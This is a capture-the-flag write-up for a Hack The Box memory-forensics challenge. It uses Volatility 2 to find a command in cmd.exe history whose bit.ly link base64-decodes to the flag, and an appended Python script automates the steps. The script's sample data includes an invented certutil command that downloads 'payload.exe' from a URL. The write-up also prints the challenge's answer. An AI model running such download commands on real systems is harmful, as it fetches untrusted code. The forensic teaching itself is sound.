We are given a memory image (a .raw file) from HTB. I found a tool called Volatility that we can use to analyze it.
I downloaded the source for Volatility v2.6.1 from their GitHub.
Note, I tried using the newer Volatility 3, but it is missing essential plugins that I needed to complete this challenge.
Volatility v2 runs on Python 2, which at the time of writing is no longer supported, so some additional setup is required to get rid of errors. Get a working pip for Python 2 first, then the two dependencies that have drifted:
$ curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
$ python2 get-pip.py --user
# the pip2 this installed (under ~/.local/bin) was not in my PATH, so I had to call it by full path
# pycrypto is no longer supported either; pycryptodome is its drop-in replacement
$ /home/kali/.local/bin/pip2 install pycryptodome
# distorm3 is the disassembler used by Volatility's code-analysis plugins; build it from source
$ git clone https://github.com/gdabah/distorm.git
$ cd distorm
$ python2 setup.py build
$ sudo python2 setup.py install
I found a cheat sheet from SANS on using Volatility to analyze memory:
https://www.sans.org/posters/memory-forensics-cheat-sheet/
It outlines six crucial steps to take; the first of them, identifying rogue processes, is all this challenge needs.
PreReq:
I set the location using an export command like so:
$ export VOLATILITY_LOCATION=file:///home/kali/Downloads/WIN-LQS146OE2S1-20201027-142607.raw
Now we can run imageinfo to get the suggested profiles:
$ ./vol.py imageinfo
The top suggestion is Win7SP1x64, and we can set it the same way, so that every later command picks it up:
$ export VOLATILITY_PROFILE=Win7SP1x64
Identify Rogue Processes
With our environment variables set, we can begin.
Running pslist shows a cmd.exe running as process 1640:
$ ./vol.py pslist
Following the cheat sheet, we run cmdscan, which scans the conhost.exe process for command history buffers, to see whether any typed commands are recoverable (the related consoles plugin would also recover the screen buffer):
$ ./vol.py cmdscan
We can see that the command line downloads a file from a bit.ly link. The link is URL-encoded (percent-escaped); decoding it gives:
http://bit.ly/SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=
That is not a real bit.ly link: the path is far longer than a bit.ly slug and ends in "=", the padding character of base64. Decoding it:
$ echo "SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=" | base64 -d
It turns out this is our flag!
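The whole workflow above (pslist to spot the suspicious process, cmdscan to pull the typed command, URL-decode, then base64-decode the path) can be scripted so it runs the same way on the next image. The script below is an added example written for this writeup; it is not part of the original post and not Volatility's own code. It is Python 3 and only calls vol.py as a subprocess, so Volatility 2 staying on Python 2 does not matter. It assumes vol.py is on PATH (or named in a hypothetical VOL environment variable) and that VOLATILITY_LOCATION and VOLATILITY_PROFILE are exported as shown above; when no image is available it falls back to the constructed sample plugin output embedded below, which is shaped like pslist/cmdscan output but was not taken from the challenge image (the certutil command line in it is invented, only the base64 string is the one from the writeup).

```python
import base64
import binascii
import os
import re
import shutil
import subprocess
from urllib.parse import unquote, urlparse

# Constructed sample output in the shape Volatility 2 prints for pslist.
SAMPLE_PSLIST = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------
0xfffffa8000c8e040 System                    4      0     86      519 ------      0 2020-10-27 14:20:01 UTC+0000
0xfffffa8001d7b060 explorer.exe           1512   1488     35      922      1      0 2020-10-27 14:21:13 UTC+0000
0xfffffa8001f3f8f0 cmd.exe                1640   1512      1       21      1      0 2020-10-27 14:25:40 UTC+0000
"""

# Constructed sample output in the shape of cmdscan; the certutil command is
# invented for the example, the percent-encoded bit.ly URL carries the
# base64 string from the writeup.
SAMPLE_CMDSCAN = """\
**************************************************
CommandProcess: conhost.exe Pid: 1660
CommandHistory: 0x1e8f40 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 1 LastAdded: 0 LastDisplayed: 0
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0x1ea100: certutil -urlcache -split -f http%3A%2F%2Fbit.ly%2FSFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30%3D payload.exe
"""

# pslist rows start with the object offset, then name, PID, PPID.
PSLIST_RE = re.compile(r"^0x[0-9a-f]+\s+(\S+)\s+(\d+)\s+(\d+)", re.M)
# Matches http(s):// whether or not the ':' and '/' were percent-encoded.
URL_RE = re.compile(r"https?(?::|%3A)(?:/|%2F){2}[^\s'\"<>]+", re.I)
FLAG_RE = re.compile(r"HTB\{[^}]*\}")


def find_processes(pslist_output, name):
    """Return [(pid, ppid)] for every process called `name` in pslist output."""
    return [(int(pid), int(ppid))
            for proc, pid, ppid in PSLIST_RE.findall(pslist_output)
            if proc.lower() == name.lower()]


def extract_urls(cmdscan_output):
    """Pull URLs out of the 'Cmd #n' lines of cmdscan, undoing percent-encoding."""
    urls = []
    for line in cmdscan_output.splitlines():
        if line.startswith("Cmd #"):
            urls.extend(unquote(m.group(0)) for m in URL_RE.finditer(line))
    return urls


def decode_base64_path(url):
    """Treat the URL path as base64 and return the decoded text.

    Returns None when the path is not valid base64 (strict alphabet and
    padding) or does not decode to UTF-8, which is what a real short-link
    slug usually looks like."""
    path = urlparse(url).path.lstrip("/")
    try:
        return base64.b64decode(path, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def recover_flags(cmdscan_output):
    """Every HTB{...} hidden as a base64 URL path in the command history."""
    flags = []
    for url in extract_urls(cmdscan_output):
        decoded = decode_base64_path(url)
        match = FLAG_RE.search(decoded) if decoded else None
        if match:
            flags.append(match.group(0))
    return flags


def run_plugin(plugin, vol="vol.py"):
    """Run one Volatility 2 plugin; the image and profile come from the
    VOLATILITY_LOCATION / VOLATILITY_PROFILE variables exported above."""
    result = subprocess.run([vol, plugin], check=True, capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    vol = os.environ.get("VOL", "vol.py")  # VOL is an assumed, hypothetical variable
    if os.environ.get("VOLATILITY_LOCATION") and shutil.which(vol):
        pslist_out, cmdscan_out = run_plugin("pslist", vol), run_plugin("cmdscan", vol)
    else:  # no image at hand: demonstrate on the constructed samples
        pslist_out, cmdscan_out = SAMPLE_PSLIST, SAMPLE_CMDSCAN
    for pid, ppid in find_processes(pslist_out, "cmd.exe"):
        print(f"cmd.exe pid={pid} ppid={ppid}")
    for url in extract_urls(cmdscan_out):
        print("url:", url, "->", decode_base64_path(url))
    print("flags:", recover_flags(cmdscan_out))
```

The strict base64 decode (validate=True plus a UTF-8 check) is what separates a smuggled payload from an ordinary short link: a genuine bit.ly slug such as 3x4mpl3 fails the padding check and yields None, while the challenge's path decodes cleanly to the flag.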